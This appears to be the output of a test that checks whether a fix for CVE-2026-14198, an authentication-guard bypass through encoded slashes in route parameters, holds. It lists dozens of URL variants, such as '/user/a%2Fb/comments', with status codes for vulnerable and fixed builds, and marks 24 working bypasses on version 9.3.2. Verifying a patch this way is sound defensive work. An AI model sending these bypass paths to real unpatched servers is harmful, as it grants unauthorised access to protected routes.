# CVE-2026-14198 variant probe comparison (vulnerable=9.3.2, fixed=9.3.3) # bypass = noKey===200 && withKey===200 (guard skipped AND route reachable) config | name | method | url | vuln(noKey/withKey) | fixed(noKey/withKey) | vulnBypass | fixedBypass standard | control_baseline_normal | GET | /user/alice/comments | 401/200 | 401/200 | false | false standard | control_original_%2F | GET | /user/a%2Fb/comments | 200/200 | 401/200 | true | false standard | lowercase_%2f | GET | /user/a%2fb/comments | 200/200 | 401/200 | true | false standard | param_is_only_%2F | GET | /user/%2F/comments | 200/200 | 401/200 | true | false standard | two_single_%2F_in_param | GET | /user/a%2Fb%2Fc/comments | 200/200 | 401/200 | true | false standard | mixed_case_%2F_%2f | GET | /user/a%2Fb%2fc/comments | 200/200 | 401/200 | true | false standard | double_%252F | GET | /user/a%252Fb/comments | 401/200 | 401/200 | false | false standard | double_%252f_lower | GET | /user/a%252fb/comments | 401/200 | 401/200 | false | false standard | triple_%25252F | GET | /user/a%25252Fb/comments | 401/200 | 401/200 | false | false standard | two_double_%252F | GET | /user/a%252Fb%252Fc/comments | 401/200 | 401/200 | false | false standard | quad_%2525252F | GET | /user/a%2525252Fb/comments | 401/200 | 401/200 | false | false standard | bare_%25_in_param | GET | /user/a%25b/comments | 401/200 | 401/200 | false | false standard | percent25_then_2F_noencode | GET | /user/a%252/comments | 401/200 | 401/200 | false | false standard | with_query | GET | /user/a%2Fb/comments?x=1 | 200/200 | 401/200 | true | false standard | trailing_slash | GET | /user/a%2Fb/comments/ | 404/404 | 401/404 | false | false standard | semicolon_after_param | GET | /user/a%2Fb;x/comments | 200/200 | 401/200 | true | false standard | dup_leading_slash | GET | //user/a%2Fb/comments | 404/404 | 404/404 | false | false structural:multi_param_first_%2F | multi_param_first_%2F | GET | /api/o%2Fr/x/issues | 401/200 | 401/200 | false | false structural:multi_param_second_%2F | multi_param_second_%2F | GET | /api/x/o%2Fr/issues | 401/200 | 401/200 | false | false structural:prefix_guard_%2F | prefix_guard_%2F | GET | /files/a%2Fb/download | 401/200 | 401/200 | false | false structural:double_%252F_multi_param | double_%252F_multi_param | GET | /api/o%252Fr/x/issues | 401/200 | 401/200 | false | false opts:trailing | ignoreTrailing_%2F | GET | /user/a%2Fb/comments/ | 200/200 | 401/200 | true | false opts:trailing | ignoreTrailing_%252F | GET | /user/a%252Fb/comments/ | 401/200 | 401/200 | false | false opts:trailing | ignoreDup_%2F | GET | //user/a%2Fb/comments | 404/404 | 404/404 | false | false opts:trailing | ignoreDup_%252F | GET | //user/a%252Fb/comments | 404/404 | 404/404 | false | false opts:trailing | semi_%2F | GET | /user/a%2Fb;x/comments | 200/200 | 401/200 | true | false opts:trailing | semi_%252F | GET | /user/a%252Fb;x/comments | 401/200 | 401/200 | false | false opts:dupslash | ignoreTrailing_%2F | GET | /user/a%2Fb/comments/ | 404/404 | 401/404 | false | false opts:dupslash | ignoreTrailing_%252F | GET | /user/a%252Fb/comments/ | 401/404 | 401/404 | false | false opts:dupslash | ignoreDup_%2F | GET | //user/a%2Fb/comments | 200/200 | 401/200 | true | false opts:dupslash | ignoreDup_%252F | GET | //user/a%252Fb/comments | 401/200 | 401/200 | false | false opts:dupslash | semi_%2F | GET | /user/a%2Fb;x/comments | 200/200 | 401/200 | true | false opts:dupslash | semi_%252F | GET | /user/a%252Fb;x/comments | 401/200 | 401/200 | false | false opts:trailing+dup | ignoreTrailing_%2F | GET | /user/a%2Fb/comments/ | 200/200 | 401/200 | true | false opts:trailing+dup | ignoreTrailing_%252F | GET | /user/a%252Fb/comments/ | 401/200 | 401/200 | false | false opts:trailing+dup | ignoreDup_%2F | GET | //user/a%2Fb/comments | 200/200 | 401/200 | true | false opts:trailing+dup | ignoreDup_%252F | GET | //user/a%252Fb/comments | 401/200 | 401/200 | false | false opts:trailing+dup | semi_%2F | GET | /user/a%2Fb;x/comments | 200/200 | 401/200 | true | false opts:trailing+dup | semi_%252F | GET | /user/a%252Fb;x/comments | 401/200 | 401/200 | false | false opts:semicolon | ignoreTrailing_%2F | GET | /user/a%2Fb/comments/ | 404/404 | 401/404 | false | false opts:semicolon | ignoreTrailing_%252F | GET | /user/a%252Fb/comments/ | 401/404 | 401/404 | false | false opts:semicolon | ignoreDup_%2F | GET | //user/a%2Fb/comments | 404/404 | 404/404 | false | false opts:semicolon | ignoreDup_%252F | GET | //user/a%252Fb/comments | 404/404 | 404/404 | false | false opts:semicolon | semi_%2F | GET | /user/a%2Fb;x/comments | 404/404 | 404/404 | false | false opts:semicolon | semi_%252F | GET | /user/a%252Fb;x/comments | 404/404 | 404/404 | false | false opts:all | ignoreTrailing_%2F | GET | /user/a%2Fb/comments/ | 200/200 | 401/200 | true | false opts:all | ignoreTrailing_%252F | GET | /user/a%252Fb/comments/ | 401/200 | 401/200 | false | false opts:all | ignoreDup_%2F | GET | //user/a%2Fb/comments | 200/200 | 401/200 | true | false opts:all | ignoreDup_%252F | GET | //user/a%252Fb/comments | 401/200 | 401/200 | false | false opts:all | semi_%2F | GET | /user/a%2Fb;x/comments | 404/404 | 404/404 | false | false opts:all | semi_%252F | GET | /user/a%252Fb;x/comments | 404/404 | 404/404 | false | false methods | method_normal | GET | /user/alice/comments | 401/200 | 401/200 | false | false methods | method_normal | POST | /user/alice/comments | 401/200 | 401/200 | false | false methods | method_normal | PUT | /user/alice/comments | 401/200 | 401/200 | false | false methods | method_normal | PATCH | /user/alice/comments | 401/200 | 401/200 | false | false methods | method_normal | DELETE | /user/alice/comments | 401/200 | 401/200 | false | false methods | method_normal | HEAD | /user/alice/comments | 401/200 | 401/200 | false | false methods | method_normal | OPTIONS | /user/alice/comments | 401/404 | 401/404 | false | false methods | method_bypass_%2F | GET | /user/a%2Fb/comments | 200/200 | 401/200 | true | false methods | method_bypass_%2F | POST | /user/a%2Fb/comments | 200/200 | 401/200 | true | false methods | method_bypass_%2F | PUT | /user/a%2Fb/comments | 200/200 | 401/200 | true | false methods | method_bypass_%2F | PATCH | /user/a%2Fb/comments | 200/200 | 401/200 | true | false methods | method_bypass_%2F | DELETE | /user/a%2Fb/comments | 200/200 | 401/200 | true | false methods | method_bypass_%2F | HEAD | /user/a%2Fb/comments | 200/200 | 401/200 | true | false methods | method_bypass_%2F | OPTIONS | /user/a%2Fb/comments | 404/404 | 401/404 | false | false prefix | prefix_baseline | GET | /api/user/alice/comments | 401/200 | 401/200 | false | false prefix | prefix_%2F | GET | /api/user/a%2Fb/comments | 200/200 | 401/200 | true | false prefix | prefix_%252F | GET | /api/user/a%252Fb/comments | 401/200 | 401/200 | false | false prefix | prefix_%2f_lower | GET | /api/user/a%2fb/comments | 200/200 | 401/200 | true | false SUMMARY: vulnerable bypasses=24 fixed bypasses=0 VERDICT: NO BYPASS on fixed build across all candidate variants.